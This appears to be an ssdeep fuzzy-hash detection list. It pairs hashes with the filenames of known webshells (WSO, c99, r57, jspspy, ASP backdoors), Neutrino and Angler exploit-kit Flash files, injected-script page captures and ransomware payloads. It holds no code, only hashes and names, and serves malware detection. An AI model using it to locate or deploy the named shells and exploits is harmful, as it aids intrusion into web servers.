+1536:W6TYxsEqwIJetT9cOjGFUNMFS2Y/s9Lqkfc3BrlkgnSPTCvStKy:oxSFetT6OamJAwJkgnSPQy,"body.116.001"
+1536:W6TYxsEpweB/i5KlwZJu0ZF3KptJ4FRhfzCXg3j5rl7gnSPTCvOtKy:oxhvlf0D3KpyJ7gnSPMy,"body.113.184"
+1536:w0EdWoDYQ4aylZj4wozIJbeDacah5hm4gr9jugq+I+vHfOaFyhr/:wrDYQuAwoEIDa44yDOa4hr/,"法克僵尸大马.asp"
+1536:Vyz8lTHWGdnQmi5MMEEFqyeIGuLzcgFLB0wGRQ3avMp2puEcKWAc1FFx2QLUgo0l:MxBp3avMMcIc1JvpoJ4g9P4,"r00ts无FSO组建大马.asp"
+1536:vXsSu7cKQRI1YtN+6GA48chjgNl99AO7cPwPC3FR:i2K1MN+fA9AjgNlbAO7cYPiR,"list86.txt"
+1536:vXICNgh2HI7qJn9ypNveDW4JTmKG9H6rStyvuNsVVOyZLixTEHlD61Lwqz1W:vXf42LJ6KG9iuNMZrOW,"WSO_base64.php"
+1536:VxhN22H3uiXupzq/I/i44IxynMCQyzXY8gBtXgfObH9MKqPW0O0Er1+4:PhUi8WIK4pxC5QyDY8gwObr+X4,"2016-07-08-other-Neutrino-EK-flash-exploit.swf"
+1536:VXDBIm4gcAW1Du6KyRRRRRRRRRBhCOSjuRY:xDB3uf1DJLCOSJ,"zacosmall.jpg"
+1536:vwhYk6eDLHlGB4bGobwLJT2Oka1EFo/X5yoe:6Yk6ILFU4bGUwLd10o/X5te,"Udf.dll"
+1536:vU0I1gexIcmU1+oCUVa9tlvw2+GA/+5BPROuNuMZkloS393dwI6ke:M06gex7mUZC9Z42+GAW/R+M2x3/pa,"2016-07-29-EITest-Neutrino-EK-flash-exploit-after-redwood-inc.com.swf"
+1536:VsDg5Da/0xC6oHKi24m5K6HI687ItliHrSDfCboU5d/7T:iDB/l67i27B88KLbcYT,"2016-07-18-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:VrGZlnfc2bJUWNpQH9606jvc+B6AXcVS1yv/Z:d8lnfc2bSWDQcc+B6d,"remview_2003_10_23.php"
+1536:vPhFedDbT22z6GBasRbbSzmHHHHHdlJG/jagHHHHCeCgTe/:SZv2JGJxbSzmHHHHHsHHHHHCe9S,"ironshell.jpg"
+1536:VMMAQ+c9tsgoDp7TmGjcOXlFL8vZYkbXUxr4ltI1bW3xJ1LqQ:VM0z9tHk7RjcO1OCkor4lA2YQ,"Backdoor.ASP.Ace.do-两只老虎webshell.VIP版.asp"
+1536:+VmgZzm31z5ysriezZWm9Yja4hMAJOw6nZW8Z+NK:+RZzm31zKetWr+WMAJO1zZ+NK,"b374k-2.4.poly.php"
+1536:vm0/vMGJaUpHY6Y3YgIC0ocxi4BhXxKAfxFGEyzy9D7tmZ7+nIPOxA2xZiZ2xIi/:vmzGJaMGEzD7IZ7+1xaiJknAB,"2016-03-29-page-from-ekalavvya.com-with-injected-EITest-script.txt"
+1536:VjE5gNdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Vt4,"good.php.15"
+1536:VJCenmk597tpp3gMbA+bZ7Z6eN3z5I4+TgFDjQk88qxkv66ocP7h:Gw/Np3LJZ7EknFDjxgL6oaV,"2016-03-18-pseudo-Darkleech-Angler-EK-flash-exploit-after-neways4us.com.swf"
+1536:vHE0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:vFi,"good.php.7"
+1536:Vfnvo0eMDEsBeCwzt2Si/AcfaUBqLM/afqVkQcS6DMSB5jm+7qB4g42qEjpXsR:V/vo0BDEsBe0/AcfaUBqLMXV+TqB4g4r,"Backdoor.ASP.Ace.ba.asp"
+1536:vee3LsQWgtbDp4SHuV/qvkj4PsPTfsfqc1FhiuUluHdx71z8lbYaaPdpsS/SCQix:me3Ls3gtbDutV3j4PsPraFU3luHdxRzZ,"588a682ce1f5145a8cf2df58f81ffc9b_php.txt.orig"
+1536:VCYaSXNDzayI74/Y7YG82D8orX4YAXaJYCkyFSx1rxDfqY/:VCa1axMucALhFSx1rhx/,"redcod.php"
+1536:vbCAjJ1sIjrELpYe42Lip7wNXYdss7bhplihXRPaUEVIHv93:jCAj/fk,"2016-05-25-page-from-ceisystems.it-with-injected-pseudoDarkleech-script-first-run.txt"
+1536:vB6TYxXEhdhwLe8m3LphMQJjXust1/AGlY6WIhDSPtAY5VF3gnyPTCvtHtKy:v3xYdh/3LrDXust1oGeZB3gnyPQMy,"body.127.001"
+1536:V8Obvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfub:V8Obvw60sWyB5Vx3ju1Ua9mE9x7CSlws,"swift 352c.js"
+1536:V6vYxmrtL89m5O1oypjp9LOsk1indMi+oguPTCvm:9xh9m5O1o0DF+oguPt,"body.113.029"
+1536:v6TYxyazwb4yijzM6MjibGORR49xXkKO965N9OX8+OoI8uYMUz39h5rlbgnSPTC3:5x/Q4fM6M3Oz4PkoN9OXiOfJbgnSPhy,"body.113.102"
+1536:v6TYxYaUbzAVJK0vyoQPeGnLs0PZAFmLek+rDU4i1Z+uHgnSPTCv7tS:5x+4VJKFois0PZ6ARHgnSPl,"body.113.057"
+1536:V6TYxyaRwQb0yBNSzifH+GgU1KS+By35qSOgS7qw/tKnBrlZgnSPTCvttKy:7xF70+SxBy0ofJZgnSPzy,"body.113.140"
+1536:V6TYxyanwMuZt6pUzzo6s9tFIKrJTyj5gl1/pcXiLKIYr065rl+gnSPTCvZtS:7xThpco6s9tWR5glm/J+gnSPT,"body.114.005"
+1536:v6TYxyaiwJ41JjpNxd5QMCJBj/EFUaYPL6SNwF9I/R348RlW5rlcgnSPTCv3tKy:5x+11JjLxd5yjGUaU6ZQKJcgnSPFy,"body.113.133"
+1536:v6TYxXEpK88yB5Hq9qQ0VD/mRAeKStsa7IMvZ0RDDCwtghPljygnyPTCv3tKy:5xMKL8q9qtD/muert9ILt0ygnyPJy,"body.113.300"
+1536:V6TYxXEp8887JA9JF1UotzCfjBgD4Ge7qZKK0nXREjwddgnyPTCvFtKy:7xqL87J3fjBg8qxwddgnyPTy,"body.113.318"
+1536:v6TYxXENwaXT9c2OIU8tolAG86aGG3LZea+Ek9yncV8FJgnSPTCvTtKy:5xqNTOGolAVGvDgJgnSPRy,"body.113.245"
+1536:V6TYxXE68822AaXu4MKM4c/Xh5wjErMUEQ9f7AhfqYz83fjlwEgnyPTCvltKy:7xNL2Ku4MKMZ/XhUErMUE6RlwEgnyP/y,"body.113.314"
+1536:v6TYxsEYwwGFNebVOVO37YfE46EeelFPfl7DK9TxUfYQom/KAOrlxgnSPTCvrtKy:5xQ9GHeBcew7nYNJxgnSPNy,"body.119.001"
+1536:V6TYxsEVwKrW+dyzTP8sUUnLZKdxcvG9nP7gOrlxgnSPTCvhtKy:7x93rW+MzTP8sXgRPJxgnSP3y,"body.113.186"
+1536:v6TYxsEuwxzlAvQ5fPF0FJOAdWKYxhIm8JY3rEnM0edH4UFmvZ5rlDgnSPTCv3tt:5xWOx/AdWKYXIi3QQmJDgnSPVy,"body.113.211"
+1536:V6TYxsEawX/vRVVpLQUeb+mePXClJShIP+LHz6xInltDdT3PO5rl0gnSPTCvZtKy:7xSA/jVmUeb+mZP+L2/J0gnSPHy,"body.113.229"
+1536:V4RtPvl+LliPeda0R3eo9da0R3e2EvWFCZKIVVvOzPjiTuWw6T4TR/rBPjpu22zz:stTEEvzKWw6Oaz,"t00ls.jsp"
+1536:v2PNsS27QwcqpYsEqdAHdUekxZLN9+G2MMSSq+E:f7vvpvUdUbxZLN9+G2AOE,"zehir4.txt"
+1536:UYZzFwOkuqp1VagQNOVzocysUyyiQOlHKbnFMBMK6IK8eMG:F9kuqpLvOOVzocysNhAOtfu,"shell.aspx"
+1536:+uXcpF/BB9S7hQVJDEK2SUnXNA2M7oj4X7SdKPmNPq4LukHbQ:kp7B9SaAK2SU9govdK12k,"devshell.cgi"
+1536:uw9dRsSGHDzjb76CMORZ83/Z2FoyLDfQcn70bdSTPwy9zogEMzC01rzd:xaSGvMgeR2FoyffQg70BczVEMzV3,"TurkisH-RuleZ.aspx"
+1536:Uv9pM95N87+jgvR+mKE8XiUHaMsKOIBypqP3i4GQ7IPp5S:UjMWR+mcXibKOIBypgw0,"wso-4.2.0.php"
+1536:uV1nQ7utBYhYx6yzljGPZE5RwpRzrH1Go4NIw+nQOk:SiqBYK6yRjeC4TH1I,"2016-06-20-pseudoDarkleech-Neutrino-EK-flash-exploit-after-contaratosbeach.gr.swf"
+1536:UsNXIlidXzaWRNe2dzaWRNedOnn9cum26bkWsEKpc9J:UqaWPMkWskJ,"xia.jsp"
+1536:UplZ8htz7Iqau8QV9rF1BXBQFICPZmDj6AaappwPmrFjOIf0rX/DwKCa2c:Up/8tEu8QV9rFUj4DmTavwPBDwKC/c,"2016-06-29-afraidgate-Neutrino-EK-flash-exploit-after-marketingguerrilla.es.swf"
+1536:Uob9EZwU5ddSYmC+YXWe1W/DUWRqF7iqOQ20WlNk:Rb9EZZQYXV1ZWRsN2Xbk,"2016-07-22-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:UNM8kcLGdNFypcFzlV6jMGsT4BGXzekn6pyhrTNPQD37n1mBG0D:U2xNFypcFfgSTkGjtn6MhxgzQD,"vps提权马.asp"
+1536:umUt/+0W5a44M6DEcNoxcYDIbswGPd+xJG6dUcgn5znnZD2xbZmx:umUt/+Q44M6DtocUjhwJ1EnnZaNmx,"2016-07-29-EITest-Neutrino-EK-flash-exploit-after-callkarl.ca.swf"
+1536:umnwA+sKAbzev/RYoknsbmDv2DFj1nG4lim28GUhHZoWZcFL3QUJb:+ABKO5TsbWv2DFj1lim28nByWGNgE,"2016-06-20-Afraidgate-Neutrino-EK-flash-exploit.swf"
+1536:umnwA+sKAbzev/RYoknkbmDv2DFjFnG4lim28GUhHzoWZcFAz7IeV:+ABKO5TkbWv2DFjllim28nBsWGqHF,"2016-06-20-EITest-Neutrino-EK-flash-exploit.swf"
+1536:UmcNJWocvMmmMBKzVplyORAynnk4WENJj3PDZ:U/EKzVpvRvn/fZ,"wso.txt"
+1536:UKF6yfDBIs3+a/Gtcr6nuptukBJNIH5lBJm1PqOTouooEjLYcmOwArAZzEtu4iRR:zr3+a/GepptukBDIEouooEgK3rlgs2mK,"c99shell-v1.0beta-Captain_Crunch.php"
+1536:uk5rTMxaJh2+s41m/nHE1hlRfi8lak4MpS8/UO9fWY:H50xaJoiMnElRfi8lak4MpzUO9fWY,"SyRiAn.Sh3ll.V7.txt"
+1536:Ujf231rE/gODXjRnjlIokmYbzz4l4AXZVJmQOXkoX6leyFNSISY0:e+F+DFSHGLxoX6IISY0,"2016-07-19-EITest-Neutrino-EK-flash-exploit.swf"
+1536:ujECwdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:uX,"good.php.12"
+1536:uHit1ldp4Y7ExpYGZDOiGqb0deLcP9APY4b6atX7IUshcDLIuOTNG8NPTXGA0da:Tp7ExpYGZiiGqbOAaN4vtX8FhduOB3NJ,"2016-07-14-other-Neutrino-EK-flash-exploit.swf"
+1536:UaCWAaDHYxlY5+MQkLgeH6dqCSWAAyK0DCJCQV3HBQtvEiYxbI+rjnftmZkx:WnarWlYIkHnYA9/Du5KvVGI+r8+,"2016-07-01-pseudoDarkleech-Neutrino-EK-flash-exploit-second-example.swf"
+1536:UA4aRo6WYjXFJ4HxlK5dhYJl0STAM13v70p91y4I70dk4ep70du7TF70iVuv0l+x:EJG,"2016-06-23-page-from-visajourney.com-with-malicious-injected-script.txt"
+1536:U6TYxyawwrhgkawLJPv3Msi4Tu8ziN5wR9x5pfHWgbN5rl4gnSPTCvotKy:SxMyhzZ3Ms08rXuUJ4gnSPOy,"body.113.120"
+1536:U6TYxyaAwcUb3PUIyMfMUFpSqSU1cqOlAxTJZJ1ruSjyrUaOrl+gnSPTCvotS:SxsvMV1BOlAXyQJ+gnSP+,"body.113.069"
+1536:U6TYxXEgMwK8+MZv4kylkosUD6MxkvVRB0oPdnVzFugnyPTCvItKy:SxVMp8+MSdkofmBUMxugnyPGy,"body.113.271"
+1536:u6TYxXE9ywYPk/VabaXvC/ON86UHbzszUdBd/utshDzBSWUaMAc4HgnyPTCvqtKy:wx4ywabaXv86UHbzsz+Bd/7dHgnyP0y,"body.126.001"
+1536:U6TYxXE688Mye+STwiKVWNm23JnO5b+ggjd6pXv/djjbLgnyPTCvMtKy:Sx1LMVwCm23JndhMjbLgnyPGy,"body.114.011"
+1536:u6TYxsEqwCyGVjI5lWm+X+i32X0V0trflNlhcq55/QmcAmuOrl2gnSPTCvKtKy:wxyTVjI5lx8X3S0mlpzcJ2gnSPYy,"body.113.199"
+1536:U6TYxsElHwG4Uywu4breCGWPOqOHb+3uGbSyN9JJfwy/J7Orl9gnSPTCv8tKy:SxNHt4UyIrWWPOqO7+3KwWJ9gnSPSy,"body.113.230"
+1536:u6TYxsEDwG9q+65qVKxIN29aOWtm0vXU9xXYsng0hLf0v5rlBgnSPTCvitKy:wxLO+65qVLN29aO+v+aBJBgnSPUy,"body.113.152"
+1536:U6TYxsE3wfwivRfdfDMrhThS1YU4ljtDNvIvNlDEC5rlrgnSPTCvUtKy:SxfCZDMdlO74s9JrgnSP2y,"body.113.235"
+1536:u44bvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfuB:u44bvw60sWyB5Vx3ju1Ua9mE9x7CSlwg,"swift c9eb.js"
+1536:U0cNW/iSw+CmmMRKptpzIfRey04PI12471MqJ3PDN:UqhKptpERpsJFN,"shell.php.txt"
+1536:TyOT7yklllllllllllllllllllllllllllllllllllllllllllllllllllllllle:ua0pKO/,"ok.txt"
+1536:tXGD7TVzhSpSaUdLQNDVwUp5x7NH9i3mX7bfJKMuGA+IZkwG9+FMfLJb8q:tXGD7Z0pZiENRwUpf6eRKF+Wkwvgtbp,"www.zjjv.com.php"
+1536:TxCWQOLBkF3OlAp+FUGS3AYdKIZkH8sKZkA1lYJoXPfT6g+FDhlq2g9jcTJMZii6:pQyBzlRYrt28sdJO6BtdgCNli6,"NetworkFileManagerPHP2.jpg"
+1536:TwgnGtZeNFfD6xw0B8K03qrVY1crteX5+XW4IYqZ7xzNl/FV08x5Y0oih:TwgnGtZeNFfD6xw0B8K03qrVY1crteXf,"2016-08-23-page-from-altron.com-with-injected-script.txt"
+1536:tvumMAZnhFYYq17fe4i6pWLM747n4S3OTEsGrV1:Ffu+6v7474SD,"2016-06-01-page-from-hideandseek.leadconcept.net-with-injected-pseudoDarkleech-script.txt"
+1536:TS4bNDn+XW7tpMwKHIpmOZz50Mc+TOS46XwP+k:TRndjKHIpPz50MVOUrk,"7559d477218b331ea0d00857f4c40092_php.txt"
+1536:TRsbszvZ5OPw1SKbJ05e0gzJCmf9VWkhO9AZkzWklpyThxt1axyOfLK93fziJv:TyoeqSKbJ056F9dhAWrsJu9O,"1d.asp"
+1536:trQYC32tVIV1T8HIAhwJ6JqRt5ZdOJ9Kb:c2IV1T8HIM26JqRt5ZdOJob,"rst_sql.php.php.txt"
+1536:TqNXIlidRzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcCj:TsIJlMkWsjj,"jspspy有屏幕.jsp"
+1536:tqeBbR9g8xLSB1G8I+TqoiLsRh6OET51VUWqSTmt+EjHTSHUVH0on5Z0ydVYY:dBbR9g88RgT51YSTmtUI,"r57shell1.31.php"
+1536:tPEDwdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:tm,"good.php.10"
+1536:ToNXIlidRzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcCj:TeIJlMkWsjj,"jspspypingmu.jsp"
+1536:tKvxy8j6vmyWoCZ6kyVE9kYAblukVt9JW+mFD/unoDRSRx4UJodxpXwqXyUdv1JL:iy8j6vmTG7mknoDREaxj,"abc.php"
+1536:TK4yOP04YjQbatBt8TITK3oO/Eb06OoDq:TKDQbaCDoe,"2016-07-29-page-from-callkarl.ca-with-injected-script.txt"
+1536:ThkGAlD2tqwLImx14Ya66bCiePzvjBh7NzwWzKgl9lseiY/seHFOcUpN1:wxmx+YSbCiePzvjBh7NzwWzKgl9lseif,"pic08.txt.2"
+1536:tGoZXYCQUc/SZYKcjV52QLvwchsGT0fC2q/HEhv5:t9Zlxc/XZ52QTw2sGIfMkhv5,"2016-07-11-other-Neutrino-EK-flash-exploit.swf"
+1536:TDsH70hGadPPoErzoIPvTypiUiHLJysU+i2QRbp1gmYte6Uk5pecSTbd//THb5I1:27vbG,"2016-07-08-page-from-musicmix.co-with-injected-script.txt"
+1536:TDsa70hGgdPPoar/oOPvfsp8UiDvJy0Umiakv5p1gmYCe6Uk5pecSTbd/2THb5IM:r7gbG,"2016-07-07-page-from-musicmix.co-with-injected-script.txt"
+1536:tD/iMM7rhRtMMEJUEu7hQZGndPHzkkiO6q/ln/nm:tzixtMMIUCGFQkPdn+,"2016-06-23-Neutrino-EK-flash-exploit.swf"
+1536:TdGpqtdc+WIyagR30xj0Py5IwzAEvkGlOCsL87WMYWFQH/3qNAH+u8mAvHcVjxca:pMPssL87W1o83D,"2016-06-21-page-from-fsm-europe.eu-with-injected-pseudoDarkleech-script.txt"
+1536:tdBxYwkQErp4qpCcpvnpdEpHlpjGpMRpafpVUpoZpAcp9k4bVf:tdfYOqp9pJp/pOpFpKpOp4papkpjpq4p,"allnet.jpg??.1"
+1536:+TCenmk597tpp3gMbA+bZ7Z6eN3z5I4+TgFDjQk80J3BOtl8StM:Fw/Np3LJZ7EknFDjx8M3BcO2M,"2016-03-21-pseudo-Darkleech-Angler-EK-flash-exploit-after-jacobwirth.com.swf"
+1536:TaIl/r5erXkCSSSSSScSSSSSSvhQV1+GAAWaXMYnp+8fAlKfKuQQ9:OIl/terlSSSSSScSSSSSSvQ+EWaXMYnt,"c99_locus7s2.jpg"
+1536:t9U4pYdwlQeZag3WoUdAQKw6w8NgTYjwzZl8nZNdixaqS:MdwlQQv3WXHKw6whrq6U,"icesword.aspx"
+1536:T9KUjXS9MJDWHQCq8Uw95ocE9U6ES2irBil6b4N/e2xiJSj:T9KtMJDWHC8AcT6EjqilG4N/riJw,"2016-06-21-EITest-Neutrino-EK-flash-exploit.swf"
+1536:t8NLGbxUW0XjMy8KessLePBtodG8X2S58I8KZgjRCVpU8Z8AD8zP8tlcmA7c77V5:ONL/jIxEHoVryZKK9YdSZYtlyAU7Ul,"r57_kartal.jpg"
+1536:T6TYxyFFwsxdOvwUQse4Fxto5rltgnSPTCv/tKy:9xuDxAqJtgnSP9y,"body.113.147"
+1536:t6TYxyadwZCXC7H5GOkU1BPb1Z0XmzxRzxmiLjO1bggQoOJj46Q5rlBgnSPTCv17:jxh+BP0XkxNxmiLc1JBgnSPry,"body.113.110"
+1536:t6TYxXEFqw2yVFIWV/Wk71Aw8RuUFfy5SIjD6Ry8PPCa8jZTCoI49gnSPTCvJtKy:jxIq7WV/WkxABRuUpyIIXIfbc9gnSP7y,"body.113.248"
+1536:T6TYxsESwKdPeKeel32F5X7Yfu0VOV+46ePfT2bW3G1ELiqsrtWP45rlWgnSPTCr:9xahdPeKef5Ks2q15YJWgnSPNy,"body.120.001"
+1536:t6TYxsEawZbG5cHKLsCQ/92uk0RUxHIbFYpLnuBrl4gnSPTCvJtKy:jxSKCQ/cVB+eKJ4gnSPHy,"body.113.180"
+1536:t6TYxsE4whzOJV7iJJVSaErxhTbn0/dNyupd6na5rl5gnSPTCvFtKy:jxQgOJV7iJJEaErxhMTJ5gnSPry,"body.113.209"
+1536:T1+pM645Kou5s+ZaQjDunYoC9ndiBSugkxiKoRaC8u3HF:T1LLX/Kl,"2017-02-22-page-from-simplyconfess.com-with-injected-pseudoDarkleech-script.txt"
+1536:T1E0dfdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:T7i,"good.php.3"
+1536:T0NXIlidLzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpT:TiuWPMkWsQT,"807.jsp"
+1536:SyY2LdJsg+dsRbGGcb/PAY48B4JkFMQq24wushAnBCT3Bc8jtJFOFZQ0j4lVw:ST4mwcb/IY54JkFMQq24wushAnBCT3BW,"ama.txt"
+1536:SWrlI+ahvMdaavx1TBjD553QygewWdBf2s6fbJr78KcPo1zYebCL+gToBng+s6yl:5rm+sSaaJxBjf3Qyt/dUjf578LPuYeW3,"2016-06-30-psuedoDarkleech-Neutrino-EK-flash-exploit-after-austinbioidenticaldoctor.com.swf"
+1536:SWrlI+ahvMdaavx1TBjD553QygewWdBf2s6fbJr78KcPo1zYebCL+gToBng+s6y1:5rm+sSaaJxBjf3Qyt/dUjf578LPuYeWb,"2016-06-30-EITest-Neutrino-EK-flash-exploit-after-pekabex.pl.swf"
+1536:SvjgX8JLU7/bP4RrkG+7dLITWaKjm77vmnHoC6QtwMgce3ye6c:woVHU+7NLaum3eIKPUCe3,"2016-06-29-realstatistics-gate-Neutrino-EK-flash-exploit-after-nebularoficial.com.swf"
+1536:ssspxcWbDdjdPj4ED2jZ2f+trJXEmiMKqbfVLLB:ssspxjbDdjdP7MFLB,"mal-jun3.txt"
+1536:SsruKkuw8Gq0/ap+kqw21t+SAx5aOS7wo6VzE8jNFlznk1y:PuXuyQx5aOuwo+zE8jNfiy,"MS16_032.exe"
+1536:sSK7zYLYOsy+5SvS2BSeSvm+qSMS2SSNSvC+kSeS2sSfSvT+nSNS2PS8Svb+ySY6:27kLOy+E5+MP+0k+Yo+YI+MU+M3+Y5+n,"2017-02-27-page-from-protoday.uz-with-injected-EITest-script.txt"
+1536:SQypFO8cnR8vnu3iher6mTPsgWCcWbHV7dhbdibo4uYRJA7q7mgg:SpAR8fu3CerZPsp+HVf58Rqbgg,"2016-07-15-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:SQNYKqe9EeIwmbKHkBzmuaHexXICyeFZWv:SkEeVm2HkBzVxJu,"badne2.php"
+1536:sqNXIlidOzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcZj:ssFJlMkWsgj,"jspspy.jsp"
+1536:SqfDHOlUn2R/GPB/bSToz/1p4nzXHRLi9DzH+CoyYB3lARFZC:SaDul1kB/H1p4nzXhe+hyYBGDZC,"2016-05-25-EITest-Neutrino-EK-flash-exploit.swf"
+1536:sPKodxpUoFKvfYP5gcRMC5sElPgJqxaqCwtFg9TmCkq:EKodxhFo45gXqsElRxamFkkq,"2016-07-07-pseudoDarkleech-Neutrino-EK-payload-CryptXXX-after-lawrenceparkah.com-and-toronto-annex.com.dll"
+1536:soNXIlidOzaWRNe2dzaWRNedp3n9cumC6bkWsEkpcZj:seFJlMkWsgj,"jspspy.jsp"
+1536:+sNXIlidgzaWRNe2dzaWRNedOnn9cum26bkWsEKpcQT:+qLWPMkWs5T,"mmym520.jsp"
+1536:sNqyoYQBsOBCpeFDBgdNEDhU8ixfE6+EqyoYQBsOBCpeFDBgdNEDhU8ixfE6+ovT:TCGD20DXrCGD20DXOT,"ScreenConnect.Client (6).jnlp"
+1536:snlRZH+PIeoZbo5pnhgWt3c8MccxEMseBil6b4N/G2xiJS2:EOPVibSpmrbPxE8ilG4N/jiJt,"2016-06-21-pseudoDarkleech-Neutrino-EK-flash-exploit-after-xenon.com.au.swf"
+1536:sk5rTMxaJh2+s41m/nHE1hlRfi8lak4MpS8/UO9fWY:F50xaJoiMnElRfi8lak4MpzUO9fWY,"SyRiAn_Sh3ll_by_34G13.v7.php.txt"
+1536:SI6sDVTDhYNEJZUvmSnubrmJX/dRDI2reuAGOirJMzOJyX/Gyu0ny:SkpuvFqrsVR8SOirlJ4GyuQy,"Backdoor.ASP.Ace.fr-大学生黑客网.asp"
+1536:sHNDbvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfw:sHNDbvw60sWyB5Vx3ju1Ua9mE9x7CSlv,"swift cc9.js"
+1536:SGgTBz0K0xZmEX/ph8zOVdMMAV9zP5dVv1Nt/hF:ZguK0LnX/ph8zOVWL7RdXNtn,"2016-07-28-pseudoDarkleech-Neutrino-EK-payload-CrypMIC-third-run.dll"
+1536:SfE9UdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:S0,"good.php.35"
+1536:SFb/gGXXMlidJzaWRNeWdzaWRNehEQOaczUKR7cuCOo+LkD1MuHySaYf9wnlXePN:SxJmEZtIDGuHySaPav,"jspspy2012.jsp"
+1536:SEnKal6gQzjreP/cyaRUKmGmleJVN9qyVY4LwGCNSExDcLj0h+nLrIPL+pQQrnVe:aal6dreP/cyaRUKmGmleJVN9qyVY4EH/,"传说中的草泥马4.0 (1).asp"
+1536:sDtu6FfK6I8BA19mYUExzJg6WNc5frtP:s86FfK6O7Spc,"2016-08-17-pseudoDarkleech-Neutrino-EK-payload-CrypMIC.dll"
+1536:SCEpudhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:S7,"good.php.39"
+1536:S9jC7dBFftOpP7cPT+QdFIGrrkiGZJIhhxWKBXR8:S9jC7dzmPYRTDrrLaUxWKhR8,"diam.txt.2"
+1536:S9jC7dBFffOzP7cPT+QdFIGrrkiGZJIhhxWKBXR8:S9jC7dz4PYRTDrrLaUxWKhR8,"diam.txt.1"
+1536:S9jC7dBFffOpP7cPT+Qd/IGrrkiGZJIhhxWKBXR8:S9jC7dzcPYRFDrrLaUxWKhR8,"diam.txt.3"
+1536:S9jC7dBFffOpP7cPT+QdFIG/rkiGZJIhhxWKBXR8:S9jC7dzcPYRTD/rLaUxWKhR8,"diam.txt"
+1536:S9jC7dBFffOpP7cBT+QdFIGrrkiGZJIhhxWKBXR8:S9jC7dzcPsRTDrrLaUxWKhR8,"diam.txt???"
+1536:S6TYxYaMbvuluPhC9JyRiuvt/o78TPZ8tZ4nrpendIovYURAU7LgtSPTCv2tS:kxuzulu49GtwYPZ8tZ3TZPLgtSPA,"body.113.051"
+1536:S6TYxYa5c/Ra4SXZ0vG/uuBAXAx0ZYFpQs2rAV0rsDgwFnB3dxi+JgtSPTCv2tS:kxX2RoXm40ZSQzMPvJm+JgtSPM,"body.113.038"
+1536:s6TYxXEE88CriKGg57g6YQ6qm42LT1BIkKAfuSwa8OgnyPTCvstKy:axvLC2KGg57wQ6qmbzj8OgnyPSy,"body.113.322"
+1536:S6TYxsE9wUXmWYo9kAk7B/7/kZODi/rterGqn5rlBgnSPTCvmtKy:kxFD9kAk7BoZK1JBgnSPsy,"body.113.221"
+1536:s4qyoYQBsOBCpeFDBgdNEDhU8ixfE6+EqyoYQBsOBCpeFDBgdNEDhU8ixfE6+ovT:ACGD20DXrCGD20DXOT,"ScreenConnect.Client (7).jnlp"
+1536:S3FE5gIOPvPf+Yb1rdoNxV4iSq44vwfBkUx6mB1+xkIS:GE5gIOP3f+0xyZYpqxJW,"2017-02-22-page-from-expervision.com-with-injected-EITest-HoeflerText-script.txt"
+1536:s2sBJfnW0ZfUd050+sMxElHL2jmXgpxcAep2AI4QXsS6ef4d7exD4HD5FKpgOtvV:sppZAgLy2SQr6eAd7k4HdApDvjaA,"Backdoor.ASP.Ace.bj.asp"
+1536:RzLwITdxbvBRUcN6sWjcd4o7CR5NSJBfv+y91vWb7pWK6cSlIVYrNwPK:RgITPjB9l4o7ILSTWM1v+dRVYrNwC,"2017-02-28-EITest-Rig-EK-payload-9lvn0467.exe"
+1536:RyWLBXM+y+mIhKaiOU/VWQRHaWLfhpf9+sMJeEiGFurxCR+HC7gIZ:RyWLNrn4OU9WSHvLLSkEiGFudTjIZ,"2016-07-22-Afraidgate-Neutrino-EK-flash-exploit-second-run.swf"
+1536:rwryegZKt2gxio73yGLtrK92mQpEps1hh/H6nV:rHecKY,"Crystal shell-v.1beta.php"
+1536:rVryegZKt2gxio73yGLtrK92mQpEps1hh/H6nY:rcecKJ,"Crystal shell.php"
+1536:RUYt5P3/aUdt1UsLEyBItGOod+puFXsinh/BDwKxjfKns983L:RDth3/fdPjEy+7ORhRZwKxjfADL,"2016-07-26-pseudoDarkleech-Neutrino-EK-flash-exploit-second-run.swf"
+1536:rsNXIlidRzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpj:rqIWPMkWsQj,"date.jsp.txt"
+1536:Rqe2q+/eqe7+Ogyqe7qG5M7qNwGh7ULJxS:EqAYGYqqNwGhoi,"2017-03-06-Spora-Ransomware-8th-run-Chrome_font.exe"
+1536:/RqaX8XDALENRKRkN7YL8hVtrsb//hl0q+MyhnLHf1lMFsRsB:5qaX8XDALiRKRkN7YL8Ltrsrhl0q+phA,"火狐NEW WebShell (1)_重命名_2014-10-23-14-54-16.asp"
+1536:/RqaX8XDALENRKRkN7YL8hVtrsb//hl0q+MyhnLHf1lMFsGsB:5qaX8XDALiRKRkN7YL8Ltrsrhl0q+phJ,"火狐NEW WebShell (1).asp"
+1536:R+lHxA7ga1tAkvgK2METe2P3Ldm2XOvHZrH5VkgLH1y/xF18:f7gaHvvguGem3snxrHYo1WF18,"fDHS2Cy2vOtU"
+1536:RHQyZg+LL8cUPVM+Of084Nl9y39QC9Y0MLLplDFa+2OB1w:JZg+LL8cUe+O8XNl9KuEY00Lf8,"20140901-05.jpg"
+1536:Rh5jfutTA8eZU++MEf/zlSGVLGU4gpUlJZ3ttKSKxo2ETNNBJ1zHoTqjeq035Ov4:R7qtTA8eZU++M4MHoTDKRhes3srh9jp,"r57shell1.35.php"
+1536:RGhT4z0u0lZbVX/ph8zOVdMMAV9zPduDq1:8hPu0v5X/ph8zOVWL7Uu1,"2016-07-29-EITest-Neutrino-EK-payload-CrypMIC-after-callkarl.ca.dll"
